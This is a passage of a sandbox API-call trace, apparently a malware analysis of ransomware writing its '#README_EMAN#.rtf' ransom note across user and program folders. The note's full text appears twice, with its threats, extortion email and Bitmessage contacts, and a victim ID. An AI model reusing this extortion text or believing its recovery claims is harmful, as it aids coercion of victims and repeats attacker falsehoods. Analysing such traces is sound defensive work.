r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0209.426] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0209.427] CloseHandle (hObject=0x2c8) returned 1 [0209.427] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\#readme_eman#.rtf")) returned 0x20 [0209.427] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\#readme_eman#.rtf")) returned 0x20 [0209.427] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\#readme_eman#.rtf")) returned 0x20 [0209.427] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\utlpaipsplyvaov88\\#readme_eman#.rtf")) returned 0x20 [0209.427] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_-s9qc7fmzdb\\-omfrxhku4htqhef7\\k-jt3_ff8y22f3ge\\fqtqkxshtz5\\#readme_eman#.rtf")) returned 0x20 [0209.427] Sleep (dwMilliseconds=0x3e8) [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 2 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount2=73) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount2=73) returned 3 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files\\Microsoft Office 15\\ClientX64\\", cchCount2=47) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files\\Microsoft Office 15\\ClientX64\\", cchCount2=47) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Microsoft Office 15\\ClientX64\\", cchCount2=47) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 1 [0210.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Microsoft Office 15\\ClientX64\\", cchCount1=47, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount2=45) returned 3 [0210.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0210.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount2=73) returned 3 [0210.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount2=73) returned 1 [0210.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount1=73, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\", cchCount2=73) returned 2 [0210.511] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\#readme_eman#.rtf")) returned 0x20 [0210.511] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\#readme_eman#.rtf")) returned 0x20 [0210.511] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\#readme_eman#.rtf")) returned 0xffffffff [0210.511] GetLastError () returned 0x2 [0210.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0211.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 